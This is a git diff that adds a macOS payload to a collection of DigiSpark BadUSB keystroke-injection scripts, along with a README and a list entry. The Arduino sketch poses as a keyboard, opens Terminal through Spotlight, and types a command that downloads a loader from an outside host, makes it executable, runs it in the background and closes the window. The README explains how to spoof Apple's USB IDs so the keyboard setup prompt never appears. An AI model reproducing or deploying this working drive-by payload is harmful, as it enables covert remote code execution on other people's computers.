[Script] Add macos payload script

MacOS_Payload/MacOS_payload.ino

@@ -0,0 +1,37 @@
+#include "DigiKeyboard.h"
+
+/***
+ *
+ * This is an attack for Mac (OSX) machines. It opens up a terminal window, and executes the bash command. It then downloads the loader, sets it to executable,
+ * executes it, and closes the terminal window.
+ *
+ ***/
+
+#define MOD_CMD_LEFT 0x00000008
+
+void setup() {
+  DigiKeyboard.delay(2000);
+  DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_GUI_LEFT);
+  DigiKeyboard.delay(500);
+  DigiKeyboard.print("terminal");
+  DigiKeyboard.delay(500);
+  DigiKeyboard.sendKeyStroke(KEY_ENTER);
+  DigiKeyboard.delay(1000);
+  DigiKeyboard.print("bash");
+  DigiKeyboard.delay(1000);
+  DigiKeyboard.sendKeyStroke(KEY_ENTER);
+  DigiKeyboard.delay(1000);
+  DigiKeyboard.sendKeyStroke(KEY_ENTER);
+  DigiKeyboard.print("nohup wget https://sheep.casa/payloads/linux_loader -P /tmp && nohup chmod +x /tmp/linux_loader && nohup /tmp/linux_loader & exit");
+  DigiKeyboard.delay(500);
+  DigiKeyboard.println("disown $!");
+  DigiKeyboard.delay(500);
+  DigiKeyboard.sendKeyStroke(KEY_Q, MOD_GUI_LEFT);
+  DigiKeyboard.delay(500);
+  DigiKeyboard.sendKeyStroke(KEY_ENTER);
+  DigiKeyboard.delay(10000);
+}
+
+void loop() {
+
+}

MacOS_Payload/README.md

@@ -0,0 +1,10 @@
+# Mac (OSX) Payload
+
+In order to prevent the keyboard configuration dialog box from appearing when the DigiSpark is plugged into an Apple computer, we must configure the DigiSpark to appear as if it’s an Apple keyboard.
+
+VID and PID are defined in the file `~/.arduino15/packages/digistump/hardware/avr/1.6.7/libraries/DigisparkKeyboard/usbconfig.h` We will replace the existing file with a modified Apple version when compiling the script for OSX. When we change Vendor Name and Device Name, we also have to adapt the constants for the name length.
+
+It is very similar to what we’ve used to exploit Linux machines. The major difference is the way the terminal is opened. We’ve had to modify our OSX version to use `DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_GUI_LEFT);`, which will open Spotlight search. The code will delay for .5 seconds, and search `terminal`, delay for .5 seconds, and press enter, opening the terminal.
+
+After this, in order to ensure we aren’t using Z Shell, we’ll enter `bash`. From this point on the rest of the code is exactly the same as our Linux payload. It too downloads linux_loader, which downloads and runs `linux_payload.py`.
+

README.md

@@ -23,6 +23,7 @@ Configure the Arduino IDE for the DigiSpark using: https://digistump.com/wiki/di
 - **WiFi_Profile_Grabber**: Extracts wifi profiles and saves the csv to a USB drive
 - **WiFi_Profile_Mailer**: Writes the wireless network credentials to a csv file and emails it
 - **Window_Jammer**: Spams ALT + F4 and CTRL + W key combos to force close all active windows
+- **MacOS_Payload**: This is an attack for Mac (OSX) machines. It opens up a terminal window, and executes the bash command. It then downloads the loader, sets it to executable, executes it, and closes the terminal window.
 
 # See the scripts in action
 
@@ -43,6 +44,7 @@ Click the gifs to see the full video
 - **Vel1khaN**
 - **slipperyavocado**
 - **bernsteining**
+- **alhazmy13**
 
 # Resources